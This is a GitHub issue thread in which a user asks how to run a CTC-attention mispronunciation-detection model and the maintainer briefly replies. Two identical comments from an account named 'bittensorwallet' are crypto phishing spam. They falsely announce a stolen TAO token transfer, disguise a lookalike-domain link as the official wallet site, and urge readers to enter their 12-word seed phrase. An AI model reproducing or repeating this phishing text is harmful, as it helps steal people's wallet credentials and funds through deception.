### ISSUE TITLE
Run the model

### ISSUE THREAD

**Issue by ttb06** [cageyoko/CTC-Attention-Mispronunciation#11]
As I read, step 2 and 3 is model training, and step 4 tests the ctc decoding. So, how can I run the whole model?

**Comment by cageyoko** [comment]
Sorry, I didn't understand what you meant.

**Comment by bittensorwallet** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.


![Bittensor Logo](https://confionacompra.com/wp-content/uploads/2023/12/bittensor.jpg)


**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://l.bittlensor.com/vANocg).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @nschlemm, @daedalus, @rltp, @jpugh1999, @Acex333, @pggapex, @Ganben

**Comment by bittensorwallet** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.


![Bittensor Logo](https://confionacompra.com/wp-content/uploads/2023/12/bittensor.jpg)


**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://l.bittlensor.com/vANocg).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @michaelwayman, @devderatta, @astrogatto, @j-greig, @panamantis, @lap-sys, @borzunov

**Comment by cageyoko** [comment]
I think you need to run it step by step.
